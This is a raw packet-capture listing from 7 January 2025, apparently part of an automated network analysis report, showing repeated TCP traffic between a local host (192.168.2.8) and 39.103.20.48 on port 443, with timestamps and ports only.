                                Jan 7, 2025 04:15:41.462527990 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.462580919 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.462615013 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.462663889 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.462935925 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.462985992 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.463145018 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.463196039 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.463375092 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.463424921 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.463473082 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.463520050 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.463628054 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.463680029 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.463805914 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.463852882 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.464081049 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.464128017 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.464382887 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.464435101 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.464512110 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.464559078 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.464807034 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.464873075 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465034962 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465068102 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465086937 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465094090 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465106964 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465126991 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465303898 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465348959 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465354919 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465359926 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465394974 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465605021 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465646982 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465688944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465745926 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465786934 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.465831041 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.465970993 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.466020107 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.466042042 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.466090918 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.496156931 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547061920 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547122955 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547125101 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547136068 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547164917 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547183990 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547208071 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547271013 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547311068 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547367096 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547499895 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547544956 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547602892 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547650099 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547748089 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547813892 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.547825098 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.547879934 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.548173904 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.548228979 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.548264027 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.548310995 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.548717976 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.548764944 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.548816919 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.548866987 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.549227953 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.549272060 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.549303055 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.549352884 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.549437046 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.549479961 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.549612999 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.549652100 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.549669027 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.549678087 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.549690962 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.549719095 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.549781084 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.549829960 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.550156116 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.550232887 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.550322056 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.550322056 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.550331116 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.550379992 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.550609112 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.550663948 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.550738096 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.550789118 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551014900 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551063061 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551208973 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551268101 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551379919 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551403999 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551429987 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551438093 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551448107 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551476955 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551743984 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551788092 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551795006 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551800966 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551831961 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551848888 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551857948 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.551906109 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.551990986 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.552041054 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.552293062 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.552342892 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.552387953 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.552483082 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633466005 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633524895 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633533955 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633547068 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633578062 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633595943 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633596897 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633610010 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633641005 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633660078 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633770943 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633827925 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633852959 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633898973 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633910894 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633917093 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.633953094 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.633972883 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.634110928 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.634171009 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.634186029 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.634192944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.634215117 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.634233952 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.634579897 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.634633064 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.634674072 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.634715080 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635054111 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635098934 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635127068 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635173082 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635606050 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635648966 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635663986 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635672092 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635700941 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635716915 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635812998 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635893106 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.635943890 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.635992050 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.636060953 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.636116028 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.636156082 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.636205912 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.636565924 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.636629105 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.636724949 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.636778116 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637130976 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637177944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637190104 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637201071 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637228012 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637243986 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637391090 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637442112 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637480021 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637541056 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637790918 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637823105 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637852907 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637860060 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.637871981 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.637900114 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638025999 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638077021 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638108015 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638158083 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638232946 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638284922 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638377905 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638427019 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638571024 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638619900 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.638699055 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.638742924 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.768975019 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.768989086 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769011974 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769021034 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769083023 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769099951 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769109011 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769123077 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769140959 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769201994 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769212008 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.769254923 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769283056 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.769316912 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806282043 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806358099 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806387901 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806437969 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806482077 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806526899 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806535006 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806586981 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806729078 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806782961 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806782961 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806797028 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.806828022 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806838989 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.806962013 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807003021 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807087898 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807141066 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807270050 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807311058 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807445049 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807492971 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807715893 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807800055 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.807858944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.807909966 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.808193922 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.808243990 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.808254004 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.808303118 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.808454037 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.808499098 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.808540106 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.808588028 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809123993 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809153080 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809181929 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809189081 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809201002 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809232950 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809313059 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809357882 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809365988 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809371948 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809403896 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809413910 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809792995 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.809845924 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.809962988 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810017109 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810070038 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810123920 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810237885 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810277939 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810291052 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810297966 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810324907 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810340881 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810400963 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810453892 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810661077 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810714006 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810761929 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810813904 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.810936928 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.810986042 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.811008930 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.811053038 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.811130047 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.811182976 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.019329071 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.019386053 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.435329914 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.435837984 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.529403925 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.529417038 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.529428005 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.529474020 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.529480934 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.529501915 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.529505968 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.529532909 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.529567957 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.635853052 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.635879040 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.635899067 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.635976076 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.635983944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.635994911 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.636008978 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.636044025 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.636049032 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.636132956 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.636141062 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.636166096 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.636169910 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.636187077 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.636192083 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.636328936 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.636380911 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.636389017 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.636436939 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:42.847332954 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:42.847388983 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.027218103 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.027245045 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.027260065 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.027440071 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.047110081 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.047125101 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.047137976 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.047142982 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.047717094 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.047727108 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.047745943 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.047763109 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.047955036 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.047955036 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.047964096 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.047991991 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.048326969 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.227267027 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.227292061 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.228239059 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.255218983 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.255244970 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.255259037 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.255279064 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.255292892 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.255523920 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.255534887 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.255570889 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.259265900 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.259280920 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.263134003 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.455365896 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.455394030 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.455552101 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.485917091 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.485930920 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.485943079 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.485959053 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.485981941 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.485996008 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.486047029 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.486056089 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.486167908 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.486273050 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.486273050 CET49712443192.168.2.839.103.20.48
